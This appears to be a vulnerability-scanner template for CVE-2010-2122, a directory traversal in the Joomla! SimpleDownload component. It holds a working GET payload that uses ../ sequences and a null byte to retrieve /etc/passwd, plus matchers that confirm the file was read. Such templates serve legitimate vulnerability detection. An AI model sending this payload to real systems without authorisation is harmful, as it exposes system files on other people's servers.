id: CVE-2010-2122 info: name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval author: daffainfo severity: high description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12623 - https://www.cvedetails.com/cve/CVE-2010-2122 - https://www.exploit-db.com/exploits/12618 - http://web.archive.org/web/20210624180854/https://www.securityfocus.com/bid/40192 remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2122 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/02/17